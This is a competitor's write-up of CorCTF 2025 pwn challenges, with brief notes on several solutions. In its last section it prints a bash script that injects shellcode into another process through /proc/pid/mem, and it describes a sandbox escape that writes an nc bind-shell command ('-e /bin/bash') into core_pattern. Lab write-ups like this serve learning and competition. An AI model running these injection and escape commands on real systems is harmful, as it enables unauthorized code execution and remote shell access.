CorCTF 2025: Pwn (no windows)

Created in September 01, 2025

2025

📑 Prologue

We @r3kapig and @ProjectSEKAIctf got 2nd place in CorCTF! Thank my teammates and @cor_ctf for the good time. I solved 2.5 PWN challenges and could have solved one more challenge if I had 30 more minutes after the game. I have been believing it’s a kernel 1-day challenge for 2 days.

frogcompute

I noticed the OOB access and changed the length limit but failed to construct the brainfuck program in limited bytes.

Skills I learned from my teammate @Sueasp, who finally solved the chal. This skill would move until some byte, e.g., move until 0xff: [>>>>>>>>+].

With this we’ll stop at rbp and then we change the retaddress to win function.

hangbuzz101

This chal’s fs is readonly but we are alow to create new namespace so we can create one and mount an tmpfs. Then we can run a random syzprog to trigger the warning.

zenerational-aura

Use the gadget: 0xffffffff81605e07 to pivot so we can run our ROP.

tua-cugina-systems

We failed to solve this but we are super close. we may need 30mins more to solve it. I mislead the team to think it’s 1-day kernel chal. At the end we found it’s a user space + pentesting chal.

Inject the asm to the process

#!/bin/bash
busybox sleep 15 &
VICTIM=$(pgrep -f "busybox sleep 15") && echo $VICTIM && LEAK=$(awk 'NR==1{split($1,a,"-");print a[1]}' /proc/$VICTIM/maps) && NEW_HEX=$(printf "%x" $((0x$LEAK))) && DEC_NEW=$((0x$NEW_HEX))
( printf '%*s' 761856 '' | tr ' ' '\x90'; printf $SHELLCODE ) | dd of=/proc/$VICTIM/mem bs=1 seek=$DEC_NEW conv=notrunc status=none

In the shellcode, we 1) memfd_create to put our lib in and use snprintf to bypass the name limit. 2) run TC_LIB_DIR=/proc/self//fd////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////3 tc exec e 3) escape the nsjail: echo '|/usr/bin/nc -lvnp 8165 -e /bin/bash' > /proc/sys/kernel/core_pattern and nc localhost 8165(steal from other people eploited it)

Epilogue

Cool CTF, had great time.